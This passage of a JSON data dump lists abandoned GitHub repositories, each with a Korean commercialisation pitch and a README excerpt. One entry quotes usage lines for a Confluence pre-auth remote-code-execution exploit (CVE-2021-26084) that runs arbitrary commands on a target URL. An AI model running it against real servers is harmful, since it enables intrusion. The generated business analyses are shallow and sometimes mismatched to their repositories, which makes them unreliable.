templates\n- limited templates about views\n- auto ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"lukeed/seolint","github_url":"https://github.com/lukeed/seolint","stars":16,"language":"TypeScript","license":"MIT","abandonment_months":52,"description":"# seolint 상용화 분석\n\n## 왜 보물인가\n웹사이트가 검색 엔진에 잘 노출되도록 자동으로 점검해주는 도구로, 온라인 비즈니스의 필수 요소인 검색 순위 개선을 간편하게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 온라인 쇼핑몰·블로그 운영자가 월 구독으로 자신의 사이트 검색 최적화를 자동 관리하는 웹 서비스\n2. *","readme_excerpt":"# seolint\n\n> (WIP) A robust and configurable SEO linter\n\nA work in progress – check back soon~!\n\n> **Note:** Currently traveling and forgot to push changes to this repo :sweat_smile:\n\n## Install\n\n```sh\n$ npm install seolint@next\n```\n\n## Credits\n\nOriginally written by [@nickreese](https://github.com/nickreese) to audit [Elder Guide](https://elderguide.com/).\n\n## License\n\nMIT © [Nick Reese](https://nicholasreese.com) · [Luke Edwards](https://lukeed.com)\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"dotnet-lab/AspectCore-APM","github_url":"https://github.com/dotnet-lab/AspectCore-APM","stars":6,"language":"C#","license":"MIT","abandonment_months":94,"description":"# AspectCore-APM 저장소 분석\n\n## 왜 보물인가\n소프트웨어 성능 문제를 자동으로 찾아내고 진단하는 도구로, 기업 서비스의 안정성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 모니터링 서비스**: 클라우드 기반 웹 애플리케이션의 성능 저하를 실시간으로 감지하고 알림을 보내는 서비스\n2. **내부 업무 도구**: 회사의 전","readme_excerpt":"# butterfly-csharp\n[![Build status](https://ci.appveyor.com/api/projects/status/2t22kvna6nokj80n?svg=true)](https://ci.appveyor.com/project/liuhaoyang/butterfly-csharp)  \n\nA .NET client for Butterfly-APM.  \n\n# Example\n* start [butterfly-server](https://github.com/ButterflyAPM/butterfly)\n* `git clone https://github.com/ButterflyAPM/butterfly-csharp.git`\n* `cd butterfly-csharp`\n* `dotnet run -p sample/Butterfly.Client.Sample.Frontend` and `dotnet run -p sample/Butterfly.Client.Sample.Backend`\n* browse to [http://localhost:5001/api/values](http://localhost:5001/api/values)\n* browse to [http://localhost:9618](http://localhost:9618) to view traces\n\n# Quickstart\n* create new Asp.Net Core web project.\n* `Install-Package Butterfly.Client.AspNetCore`\n* register `Butterfly services`  in `ConfigureServices` method (the `CollectorUrl` and `Service` options are required)\n  ```\n  public void ConfigureServices(IServiceCollection services)\n  {\n     //your other code \n    services.AddButterfly(option =","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"dziemba/mobymac","github_url":"https://github.com/dziemba/mobymac","stars":6,"language":"Shell","license":"mit","abandonment_months":54,"description":"# mobymac 저장소 분석\n\n## 왜 보물인가\nMac 컴퓨터에서 Docker(컨테이너 기술)를 더 쉽게 사용할 수 있도록 만든 도구로, 복잡한 설정 없이 개발자들이 빠르게 개발 환경을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: Mac 개발자들을 위한 클라우드 기반 개발환경 제공 플랫폼\n- **내부 업무 도구**: 소프트","readme_excerpt":"# mobymac\n\nAutomagically install Docker in a VirtualBox VM with super-fast NFS mounts.\n\n## What does it do?\n\n- Uninstall Docker for Mac\n- Install Virtualbox\n- Install docker client binaries\n- Create a Vagrant VM with Docker installed\n- Automatically start VM on boot/login\n- Set up NFS mounts for VM\n- Set up docker environment in `.bash_profile`, `.zprofile` or `fish.config` (optional!)\n\n## Installation\n\n1. Clone this repo:\n  ```bash\n  git clone https://github.com/dziemba/mobymac.git ~/.mobymac\n  cd ~/.mobymac\n  ```\n  \n  You can use a different path if you like. \n  The directory needs to stay where it is though after running the installer, otherwise the VM won't boot the next time.\n\n2. Run the installer\n  ```bash\n  # Install with default settings\n  # (4096MB RAM, 50GB data disk, automatic shell integration, VM IP: 192.168.42.2)\n  ./install.sh\n\n  # Or run the installer with custom settings\n  # ./install.sh [VM memory in MB] [data disk size in GB] [shell integration] [VM IP subnet]\n  ./in","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"i0Ek3/work-and-life-in-system","github_url":"https://github.com/i0Ek3/work-and-life-in-system","stars":6,"language":"","license":"unknown","abandonment_months":35,"description":"# work-and-life-in-system 분석\n\n## 왜 보물인가\n일과 삶의 균형을 체계적으로 관리하고 싶은 사람들을 위해 실질적인 솔루션을 제공하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 직장인 대상 '업무-휴식 밸런스 추적 앱' 구독 서비스\n2. **내부 업무 도구**: 대기업 HR팀이 직원 번아웃 예방을 위해 사용하","readme_excerpt":"# **程序员在体制内的工作与生活是怎样的？**\n\n> 好好生活，爱护身体。\n\n本文在结构上做了一些调整，将正文放在了 [Context.md](Context.md) 中，而其中的第九章节单独放在了 [Story.md](Story.md) 中讲述。而这里仅留下目录作为导航，大家可以根据需求查看对应的章节。\n\n## 声明\n\n虽然在这边工作了近两年，期间也发生了很多的变动，无论是人事还是其他方面，但总的脉络和框架还是清晰的，这也就是为什么我没有再频繁更新的原因了。想要了解体制内的相关情况，把握住这些脉络就足够了。即便在不同地域、不同单位的情况是截然不同的，但核心的东西还是不变的，大家可以作为参考。\n\n## 前言\n\n这篇文章原本是要在公众号上更新的，但考虑到修改问题，还是放在了这边。公众号那边会放一个最终相对完整的版本，日常更新与整理的话还是会在这边。主要是想尽量客观、公正以及全面的展示出程序员在体制内的工作与生活的点点滴滴。意义呢，一是作为自己的经历的记录，二来也是想给后面想回来体制内的同学们一些参考，希望帮助自己的同时也能帮助其他人。\n\n本文也会征求另一位体制内程序员 S 的意见，也就是我们一批进来的。他本人是在某飞有过三年的工作经验，比起我的工作经历，可能他更符合大众程序员的情况，后面我会增加一个对他的采访，暂且叫做《S 专访》吧。也欢迎各位同学留言提问想要了解的内容，我及时补充。\n\n最后，本文未经授权禁止转载，有需要转载的同学可以留言获取授权，并保留原始作者信息和相关链接，多谢配合。为了避免隐私泄漏，本文不会使用单位真实名称，只能告知如下信息：\n\n> 西北方向地级市，四线城市。人民政府工作部门，正处级单位。\n> \n> 声明：本文所有观点均符合“因人而异”，不具有特指性，并且不同机关科室以及局属事业单位的规章制度略有不同，大家应分别看待。\n\n## 目录\n\n- [（〇）先说结论 TL;DR](Context.md#〇-先说结论-tldr)\n- [（一）情况说明](Context.md#一情况说明)\n  - [1.1 个人基本情况](Context.md#11-个人基本情况)\n  - [1.2 明确方向](Context.md#12-明确方向)\n  - [1.3 提前准备](Context.md#13-提前准备)\n- [（二）考试入编](Context.md#二考试","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"Johnson-hd/color-generate","github_url":"https://github.com/Johnson-hd/color-generate","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":52,"description":"# color-generate 상용화 분석\n\n## 왜 보물인가\n디자인이나 마케팅 작업에서 필요한 색상을 자동으로 만들어주는 도구로, 전문 디자이너가 아닌 일반 비즈니스맨도 쉽게 예쁜 색상 조합을 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 디자인 SaaS**: 중소기업 웹사이트 제작자들이 구독하면서 한 달에 월정액을 내고 색상 조합 추천을 받","readme_excerpt":"<h1 align=\"center\">Color Generate</h1>\n<p align=\"center\">\n   <a href=\"https://www.npmjs.com/package/color-generate\"><img src=\"https://img.shields.io/github/license/Johnson-hd/color-generate?color=%231890FF&style=flat-square\" alt=\"License\"></a>\n  <a href=\"https://www.npmjs.com/package/color-generate\"><img src=\"https://img.shields.io/badge/node->=14.x-brightgreen.svg\" alt=\"Version\"></a>\n  <a href=\"https://github.com/Johnson-hd/color-generate/releases/latest\"><img src=\"https://img.shields.io/github/v/release/Johnson-hd/color-generate\" alt=\"Latest release\"></a>\n  <a href=\"https://github.com/Johnson-hd/color-generate\"><img src=\"https://img.shields.io/github/stars/Johnson-hd/color-generate?color=%231890FF&style=flat-square\" alt=\"Stars\"></a>\n</p>\n\nReferring to [`Ant Design`](https://ant.design/docs/spec/colors-cn), enter a primary color to generate color steps.\n\n<font color=red>Sorry, this library has been suspended for some reason, You can see [Docs](https://color-generate-docs.sh2.agoralab.","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"codyroux/name-the-biggest-number","github_url":"https://github.com/codyroux/name-the-biggest-number","stars":5,"language":"Coq","license":"MIT","abandonment_months":45,"description":"# codyroux/name-the-biggest-number 분석\n\n## 왜 보물인가\n숫자의 크기를 비교하고 판단하는 간단하지만 유용한 프로그래밍 로직을 제공하는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 서비스**: 게임 플레이어의 점수, 레벨, 자산 크기를 자동으로 비교해 순위를 정하는 SaaS 기능\n2. **데이터 분석 도구**: 대량의 ","readme_excerpt":"# name-the-biggest-number\n\nThe point of this repository is to allow people to submit contenders for the title of **biggest number**.\n\nThe idea of this competition is described by Scott Aaronson [here](https://www.scottaaronson.com/writings/bignumbers.html), but generally this is a pretty active area of recreational mathematics and a *lot* of resources can be found [hereabouts](https://googology.wikia.org/wiki/Googology_Wiki).\n\nThis repository adds 2 rather large caveats to the process:\n\n1) The numbers described must be *constructive*: no Busy Beavers or similar shenanigans! All numbers named must be computable *in principle* (more on this later).\n\n2) The numbers submitted must be **formally described** in the Coq specification system, along with a **formal proof** that they are larger than the current contender for largest number.\n\nA few base rules:\n\n- The definition of the number must take no more than 15 seconds to type-check using `coqc` on a \"reasonable\" machine.\n\n- The proof that ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"Eureka-Shoulders/fetchx","github_url":"https://github.com/Eureka-Shoulders/fetchx","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":35,"description":"# Eureka-Shoulders/fetchx 분석\n\n## 왜 보물인가\n웹사이트에서 필요한 데이터를 자동으로 수집하는 도구로, 손으로 일일이 복사-붙여넣기 하던 번거로운 작업을 프로그램이 대신 처리해줍니다.\n\n## 어디에 쓸 수 있나\n1. **부동산 정보 수집 서비스**: 전국 아파트 가격, 전세 정보를 자동으로 모아 사용자에게 제공하는 웹사이트\n2. **","readme_excerpt":"# FetchX\n\n![npm](https://img.shields.io/npm/v/@euk-labs/fetchx)\n![NPM](https://img.shields.io/npm/l/@euk-labs/fetchx)\n![GitHub Workflow Status](https://img.shields.io/github/workflow/status/Eureka-Shoulders/fetchx/CI)\n![npm](https://img.shields.io/npm/dw/@euk-labs/fetchx)\n\nFetchX is a fetching library made for React built with [axios](https://github.com/axios/axios) and [mobx](https://github.com/mobxjs/mobx) that give you an easy way to handle CRUD of entities.\n\n## Installation\n\nUsing npm:\n\n```bash\nnpm i @euk-labs/fetchx mobx mobx-react-lite\n```\n\nUsing yarn:\n\n```bash\nyarn add @euk-labs/fetchx mobx mobx-react-lite\n```\n\n### Dependencies\n\n- Axios is used to fetch data from HTTP requests\n- MobX is used to generate Stores and Hooks powered by these stores to make a beautiful reactive way to control the data on your interfaces.\n\n## Usage\n\n### `HttpService`\n\nThe HttpService is a class that will work as a wrapper for axios. It will handle all the requests and provide helpers to make your life ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"guyernest/TensorFlowTutorials","github_url":"https://github.com/guyernest/TensorFlowTutorials","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":103,"description":"# TensorFlowTutorials 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶은 초보자들을 위해 구글의 인공지능 도구를 쉽게 설명하는 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 SaaS**: 직원 대상 인공지능 입문 과정을 제공하는 유료 온라인 강의 플랫폼\n2. **내부 업무 도구**: 대학이나 학원에서 학생 교육용 커리큘","readme_excerpt":"This is a notebook tutorial for TensorFlow (mainly thorugh Keras) on MNIST data\n\nYou will go through building a simple fully connected (dense - DNN) network, then improve it using convolution (CNN), and then you will explore RNN (LSTM) for the same problem\n\n## Launching your AMI \n\nhttp://bit.ly/dlami-blog\n\nWindows users can use this bootcamp at: https://github.com/awslabs/aws-ai-bootcamp-labs\n\nNote that there are a few new AMI, choose the one with Conda:\n\n\"Deep Learning AMI (Amazon Linux) Version 1.0 - ami-77eb3a0f\n\nDeep Learning AMI with **Conda-based** virtual environments for Apache MXNet, TensorFlow, Caffe2, PyTorch, Theano, CNTK and Keras\"\n\nMake sure that you have the **keypair** you are using or download the new one that you created\n\nConnecting to the instance and opening an SSH tunnel for Jupyter on port 8888 (Ubuntu or Amazon Linux):\n\nssh -i user.pem -L localhost:8888:localhost:8888 **ubuntu**@ec2-ip-ip-ip-ip.region.compute.amazonaws.com\n\nssh -i user.pem -L localhost:8888:local","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"naver-ai/calm","github_url":"https://github.com/naver-ai/calm","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":48,"description":"# naver-ai/calm 상용화 분석\n\n## 왜 보물인가\n네이버에서 만든 기술로, 한국 대기업의 AI 연구 성과를 활용하여 신뢰도 높은 솔루션을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 고객들을 위한 AI 기반 자동화 플랫폼으로 월 구독료 청구\n2. **내부 업무 도구**: 콘텐츠 제작사, 마케팅 팀의 생산성 ","readme_excerpt":"## Keep CALM and Improve Visual Feature Attribution (ICCV 2021) | [Paper](https://arxiv.org/abs/2106.07861)\n\nJae Myung Kim<sup>1*</sup>, Junsuk Choe<sup>1*</sup>, Zeynep Akata<sup>2</sup>, Seong Joon Oh<sup>1&dagger;</sup>  \n<sub>\\* Equal contribution</sub> <sub>&dagger;</sub> <sub> Corresponding author </sub>\n\n<sup>1</sup> <sub>NAVER AI LAB</sub>  <sup>2</sup> <sub>University of T&uuml;bingen</sub> \n\n\n<p align=\"center\">\n<img src=\"teaser.png\" width=\"70%\" title=\"\" alt=\"CAM vs CALM\"></img>\n</p>\n\n### Abstract\nThe class activation mapping, or CAM, has been the cornerstone of feature attribution methods for multiple vision tasks. Its simplicity and effectiveness have led to wide applications in the explanation of visual predictions and weakly-supervised localization tasks. However, CAM has its own shortcomings. The computation of attribution maps relies on ad-hoc calibration steps that are not part of the training computational graph, making it difficult for us to understand the real meanin","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"badouralix/advent-of-code-2018","github_url":"https://github.com/badouralix/advent-of-code-2018","stars":7,"language":"Python","license":"MIT","abandonment_months":25,"description":"# Advent of Code 2018 저장소 분석\n\n## 왜 보물인가\n매년 수천 명이 참여하는 프로그래밍 문제 해결 대회의 완성된 솔루션 모음으로, 다양한 문제 풀이 기법을 학습할 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 입문자 대상 문제 풀이 튜토리얼 및 해설 서비스로 월 구독료 수익화\n2. **기업 ","readme_excerpt":"# Advent of code 2018 solutions\n\n⁣    🌟  \n    🎄  \n   🎄🎄  \n  🎄🎄🎄  \n 🎄🎄🎄🎄  \n🎄🎄🎄🎄🎄  \n  🎁🎁🎁\n\nThese are proposed solutions for the [Advent of Code 2018](http://adventofcode.com/2018).\n\nThe solutions are automatically tested with travis.\n\n[![Build Status](https://travis-ci.org/badouralix/advent-of-code-2018.svg?branch=master)](https://travis-ci.org/badouralix/advent-of-code-2018)\n\n## Usage\n\nuse `./aoc` script\n\n```text\nusage: aoc <command> [<args>]\n\naoc commands are:\n   run      Runs submissions\n   create   Creates a new submission\n   config   Configures user's parameters\n```\n\n### Examples\n\n#### Run last problem\n\n```shell\n./aoc run\n```\n\n```shell\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nRunning submissions for day 04:\n\n* part 2:\n---------------------------------------------------\nAvg over all inputs\n---------------------------------------------------\n----------  ----------  -----------  ---\nsilvestre      78452        1.99 ms  py\ndegemer        43695        2.39 ms  py\njules         ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"carlosevieira/CVE-2021-26084","github_url":"https://github.com/carlosevieira/CVE-2021-26084","stars":6,"language":"Python","license":"unknown","abandonment_months":58,"description":"# CVE-2021-26084 저장소 분석\n\n## 왜 보물인가\n보안 취약점을 찾아내고 이를 해결하는 방법을 공개적으로 공유하는 저장소로, 기업들이 자신의 시스템을 미리 점검하고 보호할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 SaaS**: 고객사의 서버에 이 취약점이 있는지 자동으로 검사하고 보고서를 제공하는 온라인 서비스\n","readme_excerpt":"# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | OGNL injection \n\n- Install requirements\n```\npip3 install -r requirements.txt\n```\n\n- Run exploit\n\n```\nUSE: python3 exploit.py https://target.com CMD\nEx: python3 exploit.py https://target.com id\nEx: python3 exploit.py https://target.com 'ls -la'\n\n```","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"thepeerstack/react-native-sdk","github_url":"https://github.com/thepeerstack/react-native-sdk","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":35,"description":"# React Native SDK 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱 개발자들이 복잡한 결제·인증 기능을 쉽게 구현할 수 있도록 미리 만들어진 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **핀테크 앱 개발 서비스**: 스타트업이 이 SDK를 활용해 빠르게 결제 기능이 있는 앱을 만들고 고객에게 판매\n2. **모바일 앱 개발사 내부 도구**:","readme_excerpt":"# Thepeer React Native SDK\n\nThepeer is a quick and secure way to send money across any business. The SDK handles connecting other businesses to your app.\n\n<img src='https://github.com/thepeerstack/thepeer-react-native/assets/23347440/effe4e48-3841-44cb-a88b-43bc745f594b' alt='screenshot of Send SDK' width='250px' />\n<img src='https://github.com/thepeerstack/thepeer-react-native/assets/23347440/bb54e005-590b-43d7-bae5-7f51af4ac746' alt='screenshot of Direct Charge SDK' width='250px' />\n\n## Installation\n\n```sh\nnpm install thepeer-react-native\n```\n\nor\n\n```sh\nyarn add thepeer-react-native\n```\n\nYou need to install `react-native-webview` if you don't have it installed. It's a dependency for this package. Here's a <a href='https://github.com/react-native-webview/react-native-webview' rel='noopener noreferrer' target='_blank'>link</a> to their docs.\n\n## Usage\n\n```js\nimport React from 'react';\nimport { View, Pressable, Text } from 'react-native';\nimport {\n  ThepeerSend,\n  ThepeerDirectCharge,\n ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"korrawe/halo","github_url":"https://github.com/korrawe/halo","stars":11,"language":"Python","license":"unknown","abandonment_months":49,"description":"# korrawe/halo 분석 보고서\n\n## 왜 보물인가\n프로젝트 규모가 작고 최근 업데이트가 중단된 상태여서, 현재로서는 검증되지 않은 실험적 코드이므로 상용화 가능성을 신중히 판단해야 합니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 소규모 스타트업의 데이터 관리 또는 자동화 시스템으로 활용\n2. **API 판매**: 특정 산업(예: ","readme_excerpt":"# HALO: A Skeleton-Driven Neural Occupancy Representation for Articulated Hands\n**Oral Presentation, 3DV 2021**\n\n### Korrawe Karunratanakul, Adrian Spurr, Zicong Fan, Otmar Hilliges, Siyu Tang  <br/>  ETH Zurich\n\n![halo_teaser](/assets/teaser.jpg \"HALO teaser\")\n\n[![report](https://img.shields.io/badge/Project-Page-blue)](https://korrawe.github.io/HALO/HALO.html)\n[![report](https://img.shields.io/badge/ArXiv-Paper-red)](https://arxiv.org/abs/2109.11399)\n\nVideo: [Youtube](http://www.youtube.com/watch?feature=player_embedded&v=QBiAN8Bobuc) <br/>\n\n## Abstract\n\nWe present Hand ArticuLated Occupancy (HALO), a novel representation of articulated hands that bridges the advantages of 3D keypoints and neural implicit surfaces and can be used in end-to-end trainable architectures. Unlike existing statistical parametric hand models (e.g.~MANO), HALO directly leverages the 3D joint skeleton as input and produces a neural occupancy volume representing the posed hand surface.\nThe key benefits of HALO","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"trailofbits/fluxture","github_url":"https://github.com/trailofbits/fluxture","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":33,"description":"# Fluxture 분석 보고서\n\n## 왜 보물인가\n소프트웨어 보안 취약점을 자동으로 찾아내는 전문가 집단(Trail of Bits)의 도구로, 개발 과정에서 보안 문제를 조기에 발견하여 나중의 비용 낭비와 피해를 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 검사 SaaS**: 개발사들이 코드를 업로드하면 자동으로 보안 문제를 진단해주는 웹","readme_excerpt":"# Fluxture\n\n[![PyPI version](https://badge.fury.io/py/fluxture.svg)](https://badge.fury.io/py/fluxture)\n[![Tests](https://github.com/trailofbits/fluxture/workflows/Tests/badge.svg)](https://github.com/trailofbits/fluxture/actions)\n[![Slack Status](https://slack.empirehacking.nyc/badge.svg)](https://slack.empirehacking.nyc)\n\nFluxture is a lightweight crawler for peer-to-peer networks like Blockchains. It currently supports the latest version\nof the Bitcoin protocol: 70015. It implements the minimum amount of the Bitcoin protocol necessary to collect geographic\nand topological information.\n\n## Quickstart\n\n```commandline\npip3 install fluxture\n```\n\nOr, to install from source (_e.g._, for development):\n\n```commandline\n$ git clone https://github.com/trailofbits/fluxture\n$ cd fluxture\n$ pip3 install -e '.[dev]'\n```\n\n## Usage\n\nTo crawl the Bitcoin network, run:\n\n```commandline\nfluxture crawl bitcoin --database crawl.db\n```\n\nThe crawl database is a SQLite database that can be reused between cra","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"Vugla/PSFadingScrollView","github_url":"https://github.com/Vugla/PSFadingScrollView","stars":8,"language":"Shell","license":"MIT","abandonment_months":103,"description":"# PSFadingScrollView 가치 평가\n\n## 왜 보물인가\n스마트폰 앱에서 스크롤할 때 화면 가장자리가 부드럽게 흐려지는 시각 효과를 간단하게 구현할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **전자책/뉴스 앱 개발** - 긴 글을 읽을 때 시각적으로 편안한 스크롤 경험 제공\n2. **소셜 미디어 앱 개발** - 피드 스크롤 시 프리미","readme_excerpt":"# PSFadingScrollView\n\n[![Version](https://img.shields.io/cocoapods/v/PSFadingScrollView.svg?style=flat)](http://cocoapods.org/pods/PSFadingScrollView)\n[![License](https://img.shields.io/cocoapods/l/PSFadingScrollView.svg?style=flat)](http://cocoapods.org/pods/PSFadingScrollView)\n[![Platform](https://img.shields.io/cocoapods/p/PSFadingScrollView.svg?style=flat)](http://cocoapods.org/pods/PSFadingScrollView)\n\n![Alt text](Screenshots/screenshot.png?raw=true)\n\n## Example\n\nTo run the example project, clone the repo, and run `pod install` from the Example directory first.\n\n## Installation\n\nPSFadingScrollView is available through [CocoaPods](http://cocoapods.org). To install\nit, simply add the following line to your Podfile:\n\n```ruby\npod 'PSFadingScrollView'\n```\n\n## Author\n\nVugla, predragsamardzic@msn.com\n\n## License\n\nPSFadingScrollView is available under the MIT license. See the LICENSE file for more info.\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"websebdev/fake_rails","github_url":"https://github.com/websebdev/fake_rails","stars":21,"language":"Ruby","license":"unknown","abandonment_months":61,"description":"# websebdev/fake_rails 상용화 분석\n\n## 왜 보물인가\n웹 개발을 배우는 학생들과 초보자들이 실제 프로젝트처럼 연습할 수 있는 간단한 개발 환경을 제공하기 때문입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코딩 교육 플랫폼**: 프로그래밍 입문 강좌에서 학생들이 직접 웹 애플리케이션을 만들어보는 실습 환경 제공\n2. **기업 신입 ","readme_excerpt":"Just having fun trying to recreate basic Rails functionality with pure ruby, no gems.\n\nInspiration and a lot of code in this repository comes from @OngMaple's amazing talk on Building web apps with Ruby Standard Library, at Euruko 2021 (https://www.youtube.com/watch?v=lxczDssLYKA) and @pedrogaspar's follow up on creating a TCP chat server (https://twitter.com/pedrogaspar/status/1398798494169772032).\n\nTo start the server, simply run `ruby server.rb`.\n\n**Index page**\n\n![Screen Shot 2021-05-30 at 11 29 01 AM](https://user-images.githubusercontent.com/23641464/120110123-50099000-c13a-11eb-9b3d-bc5f28ebd18f.png)\n\n**Show page**\n\n![Screen Shot 2021-05-30 at 11 28 27 AM](https://user-images.githubusercontent.com/23641464/120110126-53048080-c13a-11eb-8298-a762d7d02d96.png)\n","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"Ashish2030/Automatic-Friend-Request-Accepter","github_url":"https://github.com/Ashish2030/Automatic-Friend-Request-Accepter","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":61,"description":"# Automatic-Friend-Request-Accepter 분석\n\n## 왜 보물인가\n페이스북 친구 요청을 자동으로 수락해주는 프로그램으로, 소셜 미디어 관리 자동화의 초기 아이디어를 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소셜 미디어 관리 플랫폼에 \"자동 친구 요청 수락\" 기능으로 통합\n2. **내부 업무 도구**: ","readme_excerpt":"# Automatic-Friend-Request-Accepter\n\n\nhttps://user-images.githubusercontent.com/61516051/120263776-02b42c80-c2ba-11eb-9801-8f70fdda926e.mp4\n\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"up9inc/gopygo","github_url":"https://github.com/up9inc/gopygo","stars":7,"language":"Python","license":"MIT","abandonment_months":64,"description":"# up9inc/gopygo 분석 리포트\n\n## 왜 보물인가\nPython 코드를 Go 언어로 자동 변환해주는 도구로, 느린 시스템을 빠르게 만들고 싶은 기업들에게 큰 가치를 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기존 Python으로 만든 웹 애플리케이션의 성능을 10배 이상 향상시켜 더 많은 사용자를 감당할 수 있는 ","readme_excerpt":"# gopygo\n\nPure Python Go parser, AST and unparser library\n\n## Installation\n\n```shell\n$ pip3 install gopygo\n```\n\n## Usage\n\nParse and unparse the Go *Hello, World!* example:\n\n```python\n>>> import gopygo\n>>> program = \"\"\"\n... package main\n... \n... import \"fmt\"\n... \n... func main() {\n...     fmt.Println(\"Hello, World!\")\n... }\n... \"\"\"\n>>> program = program.lstrip()\n>>> tree = gopygo.parse(program)\n>>> tree\n<gopygo.ast.File object at 0x7f0b5dddb6d0>\n>>> tree.__dict__\n{'name': <gopygo.ast.Package object at 0x7f0b5dddb0a0>, 'imports': [<gopygo.ast.ImportSpec object at 0x7f0b5dddb190>], 'decls': [<gopygo.ast.FuncDecl object at 0x7f0b5dddb520>]}\n>>> text = gopygo.unparse(tree)\n>>> print(text)\npackage main\n\nimport \"fmt\"\n\nfunc main() {\n    fmt.Println(\"Hello, World!\")\n}\n\n>>> assert program == text\n```\n\n## Roadmap\n\nImplement the AST nodes specified in [here](https://golang.org/pkg/go/ast/) and the parser, unparser libraries accordingly.\n\nTokens are defined in [here](https://golang.org/pkg/go/token/","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"composer/package-versions-deprecated","github_url":"https://github.com/composer/package-versions-deprecated","stars":5,"language":"PHP","license":"MIT","abandonment_months":53,"description":"# composer/package-versions-deprecated 평가\n\n## 왜 보물인가\n소프트웨어 개발 시 오래된 라이브러리 사용을 자동으로 감지해 보안 위험을 조기에 차단할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 사용하는 코드 검사 플랫폼으로 월간 구독형으로 제공\n2. **내부 업무 도구**: 기업의","readme_excerpt":"# Package Versions\n\n**`composer/package-versions-deprecated` is a fully-compatible fork of [`ocramius/package-versions`](https://github.com/Ocramius/PackageVersions)** which provides compatibility with Composer 1 and 2 on PHP 7+. It replaces ocramius/package-versions so if you have a dependency requiring it and you want to use Composer v2 but can not upgrade to PHP 7.4 just yet, you can require this package instead.\n\nIf you have a **direct** dependency on `ocramius/package-versions`, we recommend that once you migrated to Composer 2.x you also migrate to use the [`Composer\\InstalledVersions`](https://getcomposer.org/doc/07-runtime.md#installed-versions) class which offers the functionality present here out of the box. You can then remove the require on this package.\n\nThis package is EOL / deprecated and you should aim to migrate away from it as soon as possible!\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"mvximenko/flat-ui-colors","github_url":"https://github.com/mvximenko/flat-ui-colors","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# flat-ui-colors 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 예쁜 색상들을 미리 정리해둔 디자인 자산으로, 누구나 쉽게 가져다 쓸 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 디자인 도구 SaaS**\nFigma, Adobe XD 같은 디자인 소프트웨어에 통합되는 색상 라이브러리 플러그인으로 월 구독 판매\n\n**2. ","readme_excerpt":"# Flat UI Colors\n\n### Clone of Flat UI Colors with additional features, built with\n\n- [React](https://reactjs.org/)\n- [Material UI](https://material-ui.com/)\n\n## Getting Started\n\n```\ngit clone https://github.com/mvximenko/flat-ui-colors.git\n```\n\n```\nnpm install\n```\n\n```\nnpm start\n```\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"OpnTec/ots15-companion","github_url":"https://github.com/OpnTec/ots15-companion","stars":12,"language":"Java","license":"Apache-2.0","abandonment_months":134,"description":"# OpnTec/ots15-companion 상용화 분석\n\n## 왜 보물인가\n2015년 이후 업데이트되지 않은 프로젝트로, 현대적 유지보수와 기능 개선을 통해 새로운 가치를 창출할 수 있는 잠재력이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 데이터 관리/분석 시스템으로 재개발하여 자동화 솔루션 판매\n2. **SaaS 서비스*","readme_excerpt":"# OpenTech summit 2015 app based on FOSSASIA companion-android\n\nAdvanced native Android schedule browser application for the [FOSSASIA](http://fossasia.org/) conference in 